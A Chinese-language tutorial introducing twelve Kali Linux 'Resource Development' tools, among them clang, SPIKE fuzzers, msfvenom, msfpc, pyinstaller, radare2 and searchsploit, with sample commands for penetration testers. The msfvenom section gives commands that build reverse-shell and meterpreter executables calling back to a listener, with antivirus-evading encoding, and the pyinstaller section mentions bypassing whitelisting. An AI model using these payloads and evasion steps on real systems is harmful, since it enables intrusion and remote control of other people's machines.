kali基础介绍（Resource Development 资源开发）

图中展示的是 Kali Linux 系统中“资源开发”（Resource Development）分类下的 12个核心工具，主要用于漏洞利用代码编写、Shellcode 生成、程序逆向、漏洞数据库查询等任务。这些工具是渗透测试人员在初始访问、执行、权限提升等攻击阶段的重要支撑，尤其在定制化攻击载荷开发中不可或缺。

（一）clang

作用：C/C++/Objective-C 编译器前端，基于 LLVM 构建，用于编译本地程序或生成 shellcode。
功能：

• 支持多种语言：C、C++、Objective-C、OpenCL、CUDA 等。

• 编译速度快、错误提示清晰、内存占用低。

• 可跨平台编译（如为 ARM 架构生成代码）。

• 常用于编译漏洞利用代码、编写自定义 shellcode。
  常用命令：

• 编译 C 程序：

  clang hello.c -o hello
  

• 生成 shellcode（结合汇编）：

  clang -c -o shellcode.o shellcode.s
  

• 交叉编译（如为树莓派）：

  clang --target=arm-linux-gnueabihf -mcpu=cortex-a9 shellcode.c -o shellcode_arm
  

（二）clang++

作用：Clang 的 C++ 编译器前端，功能与 clang 类似，专为 C++ 代码设计。
功能：

• 支持现代 C++ 标准（如 C++17/20）。

• 可与 clang 协同工作，用于开发复杂漏洞利用框架。

• 常用于编译 Metasploit 模块、自定义 payload。
  常用命令：

• 编译 C++ 程序：

  clang++ main.cpp -o main
  

• 静态链接：

  clang++ main.cpp -static -o main_static
  

（三）generic_chunked

作用：SPIKE 框架中的模糊测试工具，用于发送分块数据包，测试目标服务对分块传输编码的处理。
功能：

• 模拟 HTTP 分块传输，发送异常分块数据。
• 用于发现 Web 服务器、代理、应用防火墙的解析漏洞。
• 常用于 Web 漏洞挖掘（如 CVE-2011-3192 Apache 分块编码漏洞）。
  使用方式：
• 编写 SPIKE 脚本，调用 generic_chunked 发送恶意分块数据。
• 结合模糊测试框架，自动化触发异常。

（四）generic_listen_tcp

作用：SPIKE 框架中的 TCP 监听工具，用于接收并记录客户端连接。
功能：

• 监听指定端口，接收 TCP 连接。

• 记录客户端发送的数据，辅助分析漏洞触发行为。

• 常用于回调 shell、反向连接测试。
  使用方式：

• 启动监听：

  generic_listen_tcp 4444
  

• 配合恶意 payload，接收目标主机的连接请求。

（五）generic_send_tcp

作用：SPIKE 框架中的 TCP 发送工具，用于向目标发送自定义 TCP 数据。
功能：

• 发送原始 TCP 数据包，支持模糊测试。

• 可构造异常请求，测试服务稳定性。

• 常用于协议模糊测试（如 FTP、SMTP、HTTP）。
  使用方式：

• 发送数据：

  generic_send_tcp target.com 80 < request.spike
  

• 结合 SPIKE 脚本，自动化发送变异数据。

（六）generic_send_udp

作用：SPIKE 框架中的 UDP 发送工具，用于发送 UDP 数据包。
功能：

• 发送原始 UDP 数据包，支持模糊测试。

• 用于测试 UDP 服务（如 DNS、DHCP、SNMP）的健壮性。
  使用方式：

• 发送 UDP 数据：

  generic_send_udp target.com 53 < dns_fuzz.spike
  

（七）msf-nasm_shell

作用：Metasploit 框架中的汇编/反汇编工具，用于生成和调试 x86 shellcode。
功能：

• 实时汇编：将汇编指令转换为机器码。

• 反汇编：将十六进制 shellcode 还原为汇编指令。

• 常用于编写、调试自定义 shellcode。
  使用方式：

• 启动：

  msf-nasm_shell
  

• 汇编指令：

  xor eax, eax
  

• 反汇编 shellcode：

  \x31\xc0
  

（八）msfpc

作用：Metasploit 命令行快捷启动器，用于快速生成、执行 payload。
功能：

• 图形化向导：引导用户选择目标平台、payload 类型。

• 快速生成：一键生成可执行文件、脚本、Shellcode。

• 支持多种输出格式（EXE、ELF、PHP、Python 等）。
  使用方式：

• 启动向导：

  msfpc
  

• 选择平台（如 Windows）、payload（如 reverse_tcp），生成 EXE。

（九）msfvenom

作用：Metasploit 的 payload 生成与编码工具，用于创建免杀、跨平台的攻击载荷。
功能：

• 生成多种 payload（如 reverse shell、bind shell）。

• 支持编码、混淆、加密，绕过杀毒软件。

• 可嵌入到合法程序中，实现 DLL 注入、进程 hollowing。
  常用命令：

• 生成 Linux reverse shell：

  msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
  

• 生成 Windows EXE：

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
  

• 多重编码：

  msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe -o shell_encoded.exe
  

（十）pyinstaller

作用：Python 程序打包工具，将 Python 脚本打包为独立可执行文件。
功能：

• 支持 Windows、Linux、macOS。

• 可打包为单文件、目录模式，支持图标替换。

• 常用于将 Python 编写的 payload 打包为 EXE，绕过白名单。
  常用命令：

• 打包单文件：

  pyinstaller --onefile script.py
  

• 指定图标：

  pyinstaller --onefile --icon=icon.ico script.py
  

（十一）radare2

作用：开源的逆向工程框架，支持二进制分析、调试、反汇编。
功能：

• 支持多种架构（x86、ARM、MIPS、PowerPC 等）。

• 提供命令行界面，支持脚本扩展。

• 可分析 ELF、PE、Mach-O 等格式文件。
  常用命令：

• 分析二进制：

  r2 /path/to/binary
  

• 反汇编主函数：

  pdf @ main
  

• 交互式调试：

  doo
  

（十二）searchsploit

作用：本地漏洞数据库查询工具，用于快速查找公开漏洞利用代码。
功能：

• 内置 Exploit-DB 数据库，支持离线搜索。

• 可按关键词、CVE 编号、平台、语言搜索。

• 支持复制漏洞文件到当前目录。
  常用命令：

• 搜索关键词：

  searchsploit vsftpd
  

• 按 CVE 搜索：

  searchsploit CVE-2011-2523 # 该漏洞已修复，本地搜索大概率搜不到了
  

• 复制漏洞文件：

  searchsploit -m 12345